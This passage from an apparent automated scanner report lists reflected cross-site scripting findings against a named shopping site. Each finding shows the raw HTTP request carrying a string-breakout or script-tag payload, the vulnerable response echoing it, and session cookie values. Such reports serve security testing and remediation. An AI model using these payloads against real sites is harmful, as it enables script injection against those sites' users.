The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 773aa'-alert(1)-'3b3431ae4a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784773aa'-alert(1)-'3b3431ae4a2/Clothing/8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:41:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784773aa'-alert(1)-'3b3431ae4a2/Clothing/8';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.793. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e762b'-alert(1)-'b7da0b992a8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Clothinge762b'-alert(1)-'b7da0b992a8/8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:49:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/194367784/Clothinge762b'-alert(1)-'b7da0b992a8/8';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.794. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fb8e'-alert(1)-'9408840ac16 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Clothing/89fb8e'-alert(1)-'9408840ac16 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:56:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/194367784/Clothing/89fb8e'-alert(1)-'9408840ac16';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.795. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Cosmetics/34

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60c57"><a>4f75c0944c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping60c57"><a>4f75c0944c4/Clothing-Accessories/194367784/Cosmetics/34 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:58:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping60c57"><a>4f75c0944c4">
...[SNIP]...

4.796. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Cosmetics/34

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c3a5'-alert(1)-'62451a45166 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping2c3a5'-alert(1)-'62451a45166/Clothing-Accessories/194367784/Cosmetics/34 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:07:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping2c3a5'-alert(1)-'62451a45166/Clothing-Accessories/194367784/Cosmetics/34';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.797. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Cosmetics/34

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e461b'-alert(1)-'1f0c6034c44 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessoriese461b'-alert(1)-'1f0c6034c44/194367784/Cosmetics/34 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:11:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessoriese461b'-alert(1)-'1f0c6034c44/194367784/Cosmetics/34';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.798. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Cosmetics/34

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2f203<script>alert(1)</script>392bfe39fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories2f203<script>alert(1)</script>392bfe39fc/194367784/Cosmetics/34 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:12:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories2f203<script>alert(1)</script>392bfe39fc <a href="#" id="backlink">
...[SNIP]...

4.799. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Cosmetics/34

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a874'-alert(1)-'53dfde29a7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/1943677849a874'-alert(1)-'53dfde29a7a/Cosmetics/34 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:17:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories/1943677849a874'-alert(1)-'53dfde29a7a/Cosmetics/34';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.800. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Cosmetics/34

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5848c'-alert(1)-'fe4310aff25 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Cosmetics5848c'-alert(1)-'fe4310aff25/34 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:24:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories/194367784/Cosmetics5848c'-alert(1)-'fe4310aff25/34';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.801. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Cosmetics/34

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b727e'-alert(1)-'e987292a2c9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Cosmetics/34b727e'-alert(1)-'e987292a2c9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:27:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories/194367784/Cosmetics/34b727e'-alert(1)-'e987292a2c9';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.802. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Fragrance/39

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63e2a'-alert(1)-'242e5a582a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping63e2a'-alert(1)-'242e5a582a6/Clothing-Accessories/194367784/Fragrance/39 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:03:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping63e2a'-alert(1)-'242e5a582a6/Clothing-Accessories/194367784/Fragrance/39';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.803. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Fragrance/39

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97c42"><a>2bff35564b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping97c42"><a>2bff35564b4/Clothing-Accessories/194367784/Fragrance/39 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:52:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping97c42"><a>2bff35564b4">
...[SNIP]...

4.804. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Fragrance/39

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 10209<script>alert(1)</script>85b58cd2fad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories10209<script>alert(1)</script>85b58cd2fad/194367784/Fragrance/39 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:08:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories10209<script>alert(1)</script>85b58cd2fad <a href="#" id="backlink">
...[SNIP]...

4.805. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 2]

Summary

